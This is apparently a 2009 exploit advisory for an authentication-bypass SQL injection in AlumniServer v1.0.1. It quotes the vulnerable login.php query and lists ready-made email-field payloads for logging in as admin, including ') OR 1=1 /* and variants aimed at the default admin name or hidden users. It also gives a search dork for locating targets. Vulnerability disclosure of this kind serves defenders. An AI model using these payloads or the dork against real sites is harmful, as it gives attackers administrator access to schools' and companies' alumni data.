--------------------------------------------------------- SQL INJECTION VULNERABILITY --AlumniServer v-1.0.1--> --------------------------------------------------------- CMS INFORMATION: -->WEB: http://www.alumniserver.net/ -->DOWNLOAD: http://www.alumniserver.net/ -->DEMO: N/A -->CATEGORY: CMS/Education -->DESCRIPTION: Open Source Alumni software, based on PHP+MySQL for universities, schools and companies. Services for usersinclude profile page,... -->RELEASED: 2009-06-11 CMS VULNERABILITY: -->TESTED ON: firefox 3 -->DORK: "AlumniServer project" -->CATEGORY: AUTH-BYPASS (SQLi) -->AFFECT VERSION: CURRENT -->Discovered Bug date: 2009-06-16 -->Reported Bug date: 2009-06-16 -->Fixed bug date: N/A -->Info patch (????): N/A -->Author: YEnH4ckEr -->mail: y3nh4ck3r[at]gmail[dot]com -->WEB/BLOG: N/A -->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo. -->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!) ##################### //////////////////// AUTH-BYPASS (SQLi): //////////////////// ##################### <<<<---------++++++++++++++ Condition: magic quotes=OFF +++++++++++++++++--------->>>> ----------- VULN FILE: ----------- Path --> [HOME_PATH]/login.php Lines --> 26, 32, 72 //Note: requestVar is a function against LFI and XSS mainly, //avoiding register_globals ON and filtering \r\n, \r, \0, etc and using htmlespecialchars. ... 26: $email=requestVar('login','',true); ... 32: $pwd=requestVar('password','',true); ... 72: $result=mysql_query("SELECT * FROM `as_users` WHERE (email LIKE '".$email."') AND (password LIKE '".md5($pwd)."') LIMIT 1",$dbh); <-- Vuln line ... ----------- EXPLOITS: ----------- [!!!] Case-1: If only one user (rarely)... ~~~~~> E-Mail=y3nh4ck3r@xxxxxxxxx') OR 1=1 /* ~~~~~> Password=nothing [!!!] Case-2: If more users... [++] Note: Search mail for admin (http://[HOST]/[PATH]/Imprint.php): ~~~~~> E-Mail=[real_admin_mail]')/* ~~~~~> Password=nothing [++] Note: Search for first or second name. [++] Note: AdminGn, AdminSn By default. Not use id because it's generated randomly. With a registered user is easy to get necessary information. ~~~~~> E-Mail=y3nh4ck3r@xxxxxxxxx') OR gn='AdminGn' /* ~~~~~> Password=nothing [!!!] Case-3: If admin is a hidden user... ~~~~~> E-Mail=y3nh4ck3r@xxxxxxxxx') OR hideuser='y' /* ~~~~~> Password=nothing ####################################################################### ####################################################################### ##*******************************************************************## ## SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray, Evil1 ... ## ##*******************************************************************## ##-------------------------------------------------------------------## ##*******************************************************************## ## GREETZ TO: SPANISH H4ck3Rs community! ## ##*******************************************************************## ####################################################################### #######################################################################